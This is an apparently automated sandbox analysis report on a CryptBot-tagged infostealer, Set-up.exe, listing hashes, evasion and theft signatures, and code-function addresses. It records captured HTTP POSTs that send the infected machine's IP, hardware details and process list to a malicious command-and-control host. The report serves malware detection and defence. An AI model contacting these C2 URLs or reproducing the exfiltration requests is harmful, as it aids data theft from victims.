Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:Set-up.exe
Analysis ID:1582848
MD5:3d060ec62ad0864cfd0d40f46a4f07a9
SHA1:8caba4598d19477a1e4442c4c710fa3909023c5b
SHA256:6f80bb8b470640ae7542eb1b239f2a790d61047254accccf747c4d64907fec66
Tags:CryptBotexeuser-aachum
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Contain functionality to detect virtual machines
Infostealer behavior detected
Leaks process information
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Set-up.exe (PID: 5324 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 3D060EC62AD0864CFD0D40F46A4F07A9)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo17356394355a1Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNAvira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435http://home.eleventj11vt.top/olNAvira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435::3Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=Avira URL Cloud: Label: malware
Source: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdR435Avira URL Cloud: Label: malware
Source: Set-up.exeVirustotal: Detection: 31%Perma Link
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00898E90 Sleep,_open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,0_2_00898E90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_009B8E70 GetVersion,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,GetLastError,__acrt_iob_func,_time32,GetLastError,__acrt_iob_func,0_2_009B8E70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00526080 memset,BCryptGenRandom,0_2_00526080
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0074F6E0 wcscmp,CryptAcquireContextW,CryptGetUserKey,GetLastError,GetLastError,CryptReleaseContext,0_2_0074F6E0
Source: Set-up.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0051255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0051255D
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005129FF FindFirstFileA,FindFirstFileA,RegOpenKeyExA,RegOpenKeyExA,GetModuleFileNameA,CharUpperA,CharUpperA,strstr,CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,OpenProcess,QueryFullProcessImageNameA,QueryFullProcessImageNameA,CharUpperA,CloseHandle,CloseHandle,strstr,CreateToolhelp32Snapshot,Process32First,strncpy,_strlwr_s,strstr,strstr,strstr,strstr,CloseHandle,Process32Next,CloseHandle,CloseHandle,EnumWindows,EnumWindows,GetTickCount64,0_2_005129FF
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006EE270 _errno,FindNextFileW,WideCharToMultiByte,strlen,_errno,calloc,MultiByteToWideChar,MultiByteToWideChar,_errno,GetLastError,MultiByteToWideChar,wcscpy,FindFirstFileW,free,_errno,0_2_006EE270
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0051255D GetSystemInfo,GetSystemInfo,GlobalMemoryStatusEx,GlobalMemoryStatusEx,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,GetDiskFreeSpaceExA,strlen,EnumDisplayMonitors,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,SHGetKnownFolderPath,wcscpy,wcscat,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,K32EnumProcesses,GetTickCount64,0_2_0051255D
Source: global trafficTCP traffic: 192.168.2.4:54676 -> 1.1.1.1:53
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /olNuzJxAApOsKhOXzdRo1735639435 HTTP/1.1Host: home.eleventj11vt.topAccept: */*Content-Type: application/jsonContent-Length: 560661Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 38 38 33 34 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2
Source: global trafficHTTP traffic detected: POST /olNuzJxAApOsKhOXzdRo1735639435 HTTP/1.1Host: home.eleventj11vt.topAccept: */*Content-Type: application/jsonContent-Length: 209Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 5c 72 5c 6e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 74 69 74 6c 65 3e 3c 5c 2f 68 65 61 64 3e 5c 72 5c 6e 3c 62 6f 64 79 3e 5c 72 5c 6e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 5c 2f 68 31 3e 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 5c 2f 31 2e 32 32 2e 31 3c 5c 2f 63 65 6e 74 65 72 3e 5c 72 5c 6e 3c 5c 2f 62 6f 64 79 3e 5c 72 5c 6e 3c 5c 2f 68 74 6d 6c 3e 5c 72 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.200.57.114 34.200.57.114
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005DA8C0 recvfrom,0_2_005DA8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.eleventj11vt.top
Source: unknownHTTP traffic detected: POST /olNuzJxAApOsKhOXzdRo1735639435 HTTP/1.1Host: home.eleventj11vt.topAccept: */*Content-Type: application/jsonContent-Length: 560661Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 34 38 38 33 34 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2
Source: Set-up.exeString found in binary or memory: http://.css
Source: Set-up.exeString found in binary or memory: http://.jpg
Source: Set-up.exe, 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.eleventj11vt.top/olN
Source: Set-up.exeString found in binary or memory: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdR435
Source: Set-up.exe, Set-up.exe, 00000000.00000003.1854020138.0000000001426000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1856332412.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854245792.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854386736.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853869075.000000000141C000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
Source: Set-up.exe, 00000000.00000003.1854020138.0000000001426000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1856332412.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854245792.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854386736.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853869075.000000000141C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo17356394355a1
Source: Set-up.exe, 00000000.00000003.1854020138.0000000001426000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1856332412.000000000142A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854245792.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854386736.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853869075.000000000141C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435::3
Source: Set-up.exe, 00000000.00000002.1856204201.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1854768134.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1855090533.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1853946639.00000000013D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435?argument=
Source: Set-up.exe, 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435http://home.eleventj11vt.top/olN
Source: Set-up.exeString found in binary or memory: http://html4/loose.dtd
Source: Set-up.exeString found in binary or memory: http://timestamp.digicert.com0
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/hsts.html
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: Set-up.exeString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Set-up.exeString found in binary or memory: https://httpbin.org/ip
Source: Set-up.exe, 00000000.00000003.1676246691.00000000013D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipI
Source: Set-up.exeString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005205B00_2_005205B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00526FA00_2_00526FA0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005BE0700_2_005BE070
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0089A0000_2_0089A000
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006800F00_2_006800F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008600320_2_00860032
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005E00E00_2_005E00E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0081C0500_2_0081C050
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0089E0500_2_0089E050
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007000800_2_00700080
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007A01700_2_007A0170
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006841700_2_00684170
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0082C1A00_2_0082C1A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0077E1380_2_0077E138
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005762100_2_00576210
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008862D00_2_008862D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006A02000_2_006A0200
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0086E2F00_2_0086E2F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007D42F00_2_007D42F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005862E00_2_005862E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007003500_2_00700350
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005DC3200_2_005DC320
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005DE3E00_2_005DE3E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007CE4500_2_007CE450
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006724300_2_00672430
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005E04200_2_005E0420
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008644100_2_00864410
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006324A00_2_006324A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0055E4800_2_0055E480
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008804600_2_00880460
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0087C4700_2_0087C470
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008905900_2_00890590
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008785A00_2_008785A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0077E5D00_2_0077E5D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008805600_2_00880560
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0051E6200_2_0051E620
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0088A6100_2_0088A610
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007D26E00_2_007D26E0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008947800_2_00894780
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005DC7700_2_005DC770
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006987300_2_00698730
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007587D00_2_007587D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008767300_2_00876730
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006FA7800_2_006FA780
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008648A00_2_008648A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0088A8000_2_0088A800
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005249400_2_00524940
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0051A9600_2_0051A960
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005CC9000_2_005CC900
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006849F00_2_006849F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0088E9400_2_0088E940
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008909400_2_00890940
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006E6AC00_2_006E6AC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00708AC00_2_00708AC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0087EA700_2_0087EA70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00596AA00_2_00596AA0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007D0B700_2_007D0B70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00740B600_2_00740B60
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00876BB00_2_00876BB0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00888BF00_2_00888BF0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0086CB000_2_0086CB00
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006FABC00_2_006FABC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0051CBB00_2_0051CBB0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0089CC900_2_0089CC90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0088CD800_2_0088CD80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005C2DC00_2_005C2DC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00894D400_2_00894D40
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00884D500_2_00884D50
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0080CE300_2_0080CE30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0082AE300_2_0082AE30
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00676E900_2_00676E90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00836F800_2_00836F80
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00862F900_2_00862F90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00534F700_2_00534F70
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00638F200_2_00638F20
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006FAFC00_2_006FAFC0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005DEF900_2_005DEF90
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006EF0400_2_006EF040
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007130200_2_00713020
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0086F0100_2_0086F010
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005210E60_2_005210E6
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006311400_2_00631140
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007011000_2_00701100
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006ED1D00_2_006ED1D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006E11900_2_006E1190
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0069D2300_2_0069D230
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_005AB2D00_2_005AB2D0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0088B3800_2_0088B380
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006973100_2_00697310
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_007B33F00_2_007B33F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006FB3F00_2_006FB3F0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008874A00_2_008874A0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006334500_2_00633450
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0087D4300_2_0087D430
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0087F4300_2_0087F430
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_006EB4B00_2_006EB4B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008835B00_2_008835B0
Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_008635C00_2_008635C0
